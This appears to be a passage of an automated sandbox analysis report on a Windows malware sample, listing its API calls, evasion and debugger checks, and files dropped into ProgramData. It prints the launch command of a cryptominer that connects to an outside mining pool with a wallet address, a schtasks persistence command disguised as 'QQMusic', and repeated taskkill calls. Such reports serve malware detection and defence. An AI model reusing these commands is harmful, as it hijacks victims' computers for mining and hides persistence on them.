Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe TID: 6132 Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\SMB.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Thread delayed: delay time: 18000000 Jump to behavior
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etchCore-0.x64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\cnli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\riar-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\svchostlong.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcreposix-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\adfw.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\eteb-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etebCore-2.x86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tibe.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libeay32.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libcurl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\svchostromance.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tibe-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\ssleay32.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etch-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tibe-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\cnli-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\X86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trch-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\exma-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\posh.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\crli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcrecpp-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcla-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tucl-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\coli-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\tucl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\X64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trfo-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etchCore-0.x86.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\etebCore-2.x64.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trfo-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trch-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\dmgd-1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\posh-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libiconv-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\pcre-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trfo.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\zibe.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\adfw-2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\riar.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\serverlong.exe Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\xdvl-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\trch.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\zlib1.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\esco-0.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\ucl.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\iconv.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\libxml2.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\exma.dll Jump to dropped file
Source: C:\ProgramData\SMB.exe Dropped PE file which has not been started: C:\ProgramData\dmgd-4.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File opened / queried: VBoxMiniRdrDN
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Evaded block: after key decision
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 0_2_0041C2E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Thread delayed: delay time: 18000000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004054A0 GetModuleFileNameA,GetLogicalDriveStringsA,GetDriveTypeA,CreateThread,CloseHandle,Sleep, 0_2_004054A0
Source: C:\ProgramData\SMB.exe API call chain: ExitProcess graph end node
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr Binary or memory string: \\.\VBoxMiniRdrDN
Source: svchost.exe, 00000031.00000002.603833360.00000190E2A02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000031.00000002.603887710.00000190E2A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003A.00000002.604007738.0000026DCAA29000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133C8D4 VirtualQuery,GetSystemInfo, 37_2_0133C8D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00404F50 FindFirstFileA,lstrcmpiA,StrStrIA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Sleep,FindNextFileA,FindClose, 0_2_00404F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00435442 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen, 0_2_00435442
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004055E0 _fwprintf,FindFirstFileA,wsprintfA,wsprintfA,Sleep,MoveFileExA,Sleep,SetFileAttributesA,_fwprintf,FindNextFileA,FindClose, 0_2_004055E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042EB4F __EH_prolog3,_strlen,__cftof,FtpFindFirstFileA,FtpSetCurrentDirectoryA,FtpSetCurrentDirectoryA, 0_2_0042EB4F
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132A2C3 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 37_2_0132A2C3
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133A536 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 37_2_0133A536
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347D69 FindFirstFileExA, 37_2_01347D69
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347E6F FindFirstFileExA,FindClose, 37_2_01347E6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041E5E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetProcessHeap,InternalGetTcpTable2,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,GetCurrentProcessId,Sleep,lstrcmpiA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,GetProcessHeap,HeapFree,FreeLibrary, 0_2_0041E5E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00642CD0 mov eax, dword ptr fs:[00000030h] 0_2_00642CD0
Source: C:\ProgramData\SMB.exe Code function: 37_2_013449FA mov eax, dword ptr fs:[00000030h] 37_2_013449FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00638B0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00638B0B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041E5E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetProcessHeap,InternalGetTcpTable2,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,GetCurrentProcessId,Sleep,lstrcmpiA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,lstrcmpiA,wsprintfA,WinExec,Sleep,DeleteFileA,GetProcessHeap,HeapFree,FreeLibrary, 0_2_0041E5E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_005FB73F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_005FB73F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00638B0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00638B0B
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133DB63 SetUnhandledExceptionFilter, 37_2_0133DB63
Source: C:\ProgramData\SMB.exe Code function: 37_2_01345B43 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_01345B43
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133DA15 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_0133DA15
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133DD1B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_0133DD1B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,wsprintfA,FindCloseChangeNotification,Process32Next,CloseHandle, explorer.exe 0_2_0041F6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0066A0D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_0065E14A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_0066A1DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0066A2A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_0065D6FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0066994E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_00669B1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_00669BC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_00669C2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_00669CCA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00669D57
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_00669FAA
Source: C:\ProgramData\SMB.exe Code function: GetLocaleInfoW,GetNumberFormatW, 37_2_0133932E
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133D86B cpuid 37_2_0133D86B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041A5F0 GetSystemTimes, 0_2_0041A5F0
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132A930 GetVersionExW, 37_2_0132A930
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00408D70 htons,WSAStartup,WSASocketA,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,WSACreateEvent,WSAGetLastError,WSACreateEvent,WSAGetLastError,WSAEventSelect,WSAGetLastError,SetEvent,WSAWaitForMultipleEvents,GetLastError,WSAEnumNetworkEvents,WSAGetLastError,WSAAccept,_fwprintf,WSAGetLastError, 0_2_00408D70
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs